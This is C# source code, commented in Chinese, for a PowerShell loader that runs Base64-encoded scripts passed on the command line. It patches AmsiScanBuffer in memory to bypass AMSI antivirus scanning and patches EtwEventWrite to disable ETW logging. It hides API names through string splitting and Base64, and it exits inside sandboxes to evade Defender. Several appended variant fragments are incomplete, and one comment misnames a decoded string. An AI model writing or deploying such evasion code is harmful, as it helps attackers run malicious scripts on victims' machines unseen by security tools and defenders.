using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Collections.ObjectModel;
using System.Runtime.InteropServices;
using System.Text;
using System.Collections.Generic;
namespace MyPowershell
{
class Program
{
// 使用DllImport属性导入kernel32.dll中的GetProcAddress函数,用于获取指定模块的函数或变量的地址。
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
// 导入kernel32.dll中的LoadLibrary函数,用于加载指定的动态链接库,并返回库的句柄。
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
// 导入kernel32.dll中的VirtualProtect函数,用于改变指定内存区域的保护属性。
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
// 用于将byte数组中的数据复制到指定的内存地址中。
private static void copy(Byte[] Patch, IntPtr Address)
{
Marshal.Copy(Patch, 0, Address, 6);
}
// 此方法通过修改AmsiScanBuffer函数来bypass AMSI检测。
public static void chaching()
{
// 加载amsi.dll
IntPtr Library = LoadLibrary("a" + "m" + "s" + "i" + ".dll");
// 获取AmsiScanBuffer函数的地址
IntPtr Address = GetProcAddress(Library, "Amsi" + "Scan" + "Buffer");
uint p;
// 修改AmsiScanBuffer函数的内存保护属性
VirtualProtect(Address, (UIntPtr)5, 0x40, out p);
// 准备新的函数字节码
Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
// 将新的函数字节码复制到AmsiScanBuffer函数的地址
copy(Patch, Address);
Console.WriteLine("Patch Applied");
}
static void Main(String[] args)
{
// 如果命令行参数为空,结束程序运行
if (args.Length == 0)
Environment.Exit(1);
// 判断系统的进程数是否小于40,如果小于40则退出程序(用来反defender的沙箱)
if (Process.GetProcesses().Length < 40)
{
Console.WriteLine("The number of processes in the system is less than 40. Exiting the program.");
Environment.Exit(0);
}
List
// 如果命令行参数中包含“-s”,则执行bypass amsi的操作
if (argsList.Contains("-s"))
{
chaching();
argsList.Remove("-s"); //从参数数组中移除"-s"
}
// 对传入的Base64编码的字符串进行解码
string temp = Base64Decode(argsList[0]);
// 运行解码后的PowerShell脚本,并将执行结果输出到控制台
string s = RunScript(temp);
Console.WriteLine(s);
Console.ReadKey();
}
// Base64解码函数
public static string Base64Decode(string s)
{
return System.Text.Encoding.Default.GetString(System.Convert.FromBase64String(s));
}
// 运行PowerShell脚本并返回执行结果的函数
private static string RunScript(string script)
{
// 创建并打开一个运行空间,用于运行PowerShell命令
Runspace MyRunspace = RunspaceFactory.CreateRunspace();
MyRunspace.Open();
// 在运行空间中创建一个管道,用于存放待执行的PowerShell命令
Pipeline MyPipeline = MyRunspace.CreatePipeline();
// 在管道中添加PowerShell命令
MyPipeline.Commands.AddScript(script);
// 在管道中添加输出命令,使得PowerShell命令的执行结果能被程序获取
MyPipeline.Commands.Add("Out-String");
// 调用管道中的PowerShell命令,并获取执行结果
Collection
// 关闭运行空间
MyRunspace.Close();
// 将执行结果转换为字符串
StringBuilder sb = new StringBuilder();
foreach (PSObject pobject in outputs)
{
sb.AppendLine(pobject.ToString());
}
return sb.ToString();
}
}
}
//------------------------------------
// 判断系统的进程数是否小于40,如果小于40则退出程序(用来反defender的沙箱)
if (Process.GetProcesses().Length < 40)
{
Console.WriteLine("The number of processes in the system is less than 40. Exiting the program.");
Environment.Exit(0);
}
//------------------------------------public static void chaching()
{
// 加载amsi.dll
string base64Encoded = "YW1zaS5kbGw="; // "ntdll.dll" 的 Base64 编码
string libraryName = Encoding.UTF8.GetString(Convert.FromBase64String(base64Encoded));
IntPtr Library = LoadLibrary(libraryName);
if (Library == IntPtr.Zero)
{
Console.WriteLine("Failed to load library.");
return;
}
// 获取AmsiScanBuffer函数的地址
string base64Encoded1 = "QW1zaVNjYW5CdWZmZXI=";
string functionName = Encoding.UTF8.GetString(Convert.FromBase64String(base64Encoded1));
Console.WriteLine(functionName);
IntPtr Address = GetProcAddress(Library, functionName);
if (Address == IntPtr.Zero)
{
Console.WriteLine("Failed to get function address.");
return;
}
uint p;
// 修改AmsiScanBuffer函数的内存保护属性
VirtualProtect(Address, (UIntPtr)5, 0x40, out p);
// 准备新的函数字节码
Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
// 将新的函数字节码复制到AmsiScanBuffer函数的地址
copy(Patch, Address);
Console.WriteLine("Patch Applied");
}
//------------------------------------
public static void etw()
{
try
{
IntPtr Library = LoadLibrary("n" + "t" + "d" + "l" + "l" + ".dll");
IntPtr Address = GetProcAddress(Library, "Etw" + "Event" + "Write");
uint oldProtect;
bool protectResult = VirtualProtect(Address, (UIntPtr)1, 0x40, out oldProtect);
Byte[] Patch = { 0xC3 }; // RET 指令
Marshal.Copy(Patch, 0, Address, Patch.Length);
Console.WriteLine("ETW Patch Applied");
}
catch (Exception ex)
{
Console.WriteLine("Exception occurred: " + ex.Message);
}
}
//------------------------------------
public static string RunScript(string script)
{
using (PowerShell powerShellInstance = PowerShell.Create())
{
// 使用 AddScript 方法添加要执行的 PowerShell 脚本
powerShellInstance.AddScript(script);
// 执行脚本并收集结果
Collection
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject outputItem in psOutput)
{
// 如果有结果,则将其添加到 StringBuilder
if (outputItem != null)
{
stringBuilder.AppendLine(outputItem.BaseObject.ToString());
}
}
return stringBuilder.ToString();
}
}
//------------------------------------// 检查当前目录下是否存在 1.txt 文件
if (!File.Exists(Path.Combine(Directory.GetCurrentDirectory(), "1.txt")))
{
Environment.Exit(0);
}
//-------------------------------------s 绕过amsi
-t 绕过etw